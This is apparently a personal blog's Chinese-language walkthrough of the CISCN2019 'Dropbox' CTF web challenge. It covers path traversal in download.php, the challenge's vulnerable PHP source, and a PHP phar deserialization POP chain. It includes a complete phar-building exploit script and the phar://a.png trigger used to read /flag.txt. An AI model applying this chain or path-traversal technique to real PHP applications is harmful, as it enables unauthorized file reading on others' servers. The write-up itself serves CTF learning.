Home 刷题笔记

# [CISCN2019 华北赛区 Day1 Web1] Dropbox

巨抽象的题:

# 知识点:phar 反序列化

Phar 反序列化_葫芦娃 42 的博客 - CSDN 博客

一进来就是注册

1png

有两个选项:一个下载,一个删除。

2

# 一般看见下载 / 删除,都会有一个 download.php 可能会存在任意文件下载的漏洞
# 3

通过测试,发现 filename 参数可控 下载 index.php 发现文件不存在,可能是路径原因 通过测试,index.php 在其上级目录的上级目录

filename=…/…/index.php

看见 index.php 里 include 了 class.php

class.php:

<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);
 
class User {
    public $db;
 
    public function __construct() {
        global $db;
        $this->db = $db;
    }
 
    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }
 
    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }
 
    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }
 
    public function __destruct() {
        $this->db->close();
    }
}
 
class FileList {
    private $files;
    private $results;
    private $funcs;
 
    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);
 
        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);
 
        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }
 
    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }
 
    public function __destruct() {
        $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
        $table .= '<thead><tr>';
        foreach ($this->funcs as $func) {
            $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
        }
        $table .= '<th scope="col" class="text-center">Opt</th>';
        $table .= '</thead><tbody>';
        foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">删除</a></td>';
            $table .= '</tr>';
        }
        echo $table;
    }
}
 
class File {
    public $filename;
 
    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }
 
    public function name() {
        return basename($this->filename);
    }
 
    public function size() {
        $size = filesize($this->filename);
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
        return round($size, 2).$units[$i];
    }
 
    public function detele() {
        unlink($this->filename);
    }
 
    public function close() {
        return file_get_contents($this->filename);
    }
}
?>

download.php::

<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}
if (!isset($_POST['filename'])) {
    die();
}
include "class.php";
ini_set("open_basedir", getcwd() . ":/etc:/tmp");
chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) {
    Header("Content-type: application/octet-stream");
    Header("Content-Disposition: attachment; filename=" . basename($filename));
    echo $file->close();
} else {
    echo "File not exist";
}
?>
delete.php:


<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}
 
if (!isset($_POST['filename'])) {
    die();
}
 
include "class.php";
 
chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
    $file->detele();
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>
可以定义了很多类,那考点肯定就是序列化反序列化这里了。 审计代码,file_get_contents () 函数 $filename 参数没有过滤,肯定是通过此得到 flag。


定义的是 close 函数,我们看看哪里调用了这个 close()


发现在 User 类里的__destruct () 调用了 close ()。寻找可以触发 __destruct 的 unserialize (). 没有。


4


这里就考到了 phar 反序列化:phar:// 伪协议,我们便不再需要 unserialize (),phar 的特性,他在解析 phar 文件时时会自动对里面的内容进行反序列化。 再有 前面只允许上传图片,phar 可以解析 png 后缀,因此考点肯定是 phar 反序列化。


在 File 类中的 open () 方法,会给 $this-filename = $filename. download.php 和 delete.php 里存在 但是 download.php 会受到 init_set (“openbase_dir”,) 的限制,因此只有 delete.php 可以触发 phar 反序列化。 里面的 $file->open () 里的 file_exists () 函数 和 $file->delete () 的 unlink () 函数会触发 phar 反序列化


开始找 pop 链子:


1. 肯定是 close 方法里的 file_get_contents 函数,在 File 类中,close 方法存在 file_get_contents () 函数,在 User 中,会调用改方法 $this->db->close (),如果有回显的化,我们就可以直接构造如下 payload:


<?php
class User {
	public $db;
}
class File {
	public $filename = "/flag.txt";
}
$a = new User();
$a->db = new File();
?>
生成对应的 phar 文件即可。


生成 phar 文件的脚本:


<?php

class User {
    public $db;
}
class FileList {
    private $files;
    public function __construct()
    {
        $this->files = array(new File());
    }
}

class File {
    public $filename = '/flag.txt';
}
$a = new User();
$a->db = new FileList();

@unlink('test.phar');

$phar=new Phar('test.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->setMetadata($a);
$phar->addFromString("test.txt","test");
$phar->stopBuffering();
?>



但是没有回显,那么我们就让 $this->db = new FileList (),让它去调用 close。然而当执行 FileList->close () 时,因为 FileList 类中没有 close () 这个方法所以会调用 FileList->_call () 从而遍历全文件找 close () 方法


public function __call($func, $args) {
    array_push($this->funcs, $func);
    foreach ($this->files as $file) {
        $this->results[$file->name()][$func] = $file->$func();
    }
}
看一下这个 call 函数,它会把 close 当成参数传入 $func, $this->func () 的结果会被赋值给  this>results[this->results[file->name ()] 这个一维数组,即我们的 file_get_contents (’/flag.txt’) , 构成了一个this>results二维数组(也就是this->results二维数组(也就是 this->results [文件名][‘close’]) 学过 c 语言 二维数组更好理解一点。   这个二维数组中的 $this->results [’/flag.txt’][‘close’] 即为我们的 flag


调用完__call (),$this->results 二维数组赋值完之后。然后再调用 __destruct () 函数 去输出我们的 flag


public function __destruct() {
        $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
        $table .= '<thead><tr>';
        foreach ($this->funcs as $func) {
            $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
        }
        $table .= '<th scope="col" class="text-center">Opt</th>';
        $table .= '</thead><tbody>';
        foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">删除</a></td>';
            $table .= '</tr>';
        }
        echo $table;
    }
foreach ($this->results as $filename => result)每次把每个一级数组的值,传递给result) 每次把每个一级数组的值,传递给 result, 即 $this-results [filename][]


foreach ($result as $func => value)每次把每个二级数组的值,传递给value) 每次把每个二级数组的值,传递给 value


最终 echo $table 打印出来全部数据


链子:

User->_destruct => FileList->close() => FileList->_call('close') => File->close('/flag.txt') => $results=file_get_contents('flag.txt') => FileList->_destruct() => echo $result



注:download.php 文件中 open_basedir 限制了当前程序可以访问的目录


ini_set("open_basedir", getcwd() . ":/etc:/tmp");
因此我们只能用 delete.php 去触发 phar 反序列化


生成的 phar 文件后缀为 png 上传,


传入 filename=phar://a.png


成功 $value 带出来,把 flag 回显出来了 得到 flag


5


6


(题目无敌了,我还只是个练习时长不足 1 年的菜鸡~~~,呜呜呜,裂开哩)


      

          
      

  


   


    

  
    
      
    
    Edited on
    
  



      


  
  
Give me a cup of [coffee]~( ̄▽ ̄)~*

  

      
      

        odiws WeChat Pay
        
WeChat Pay

      

      
      

        odiws Alipay
        
Alipay

      

      
      

        odiws PayPal
        
PayPal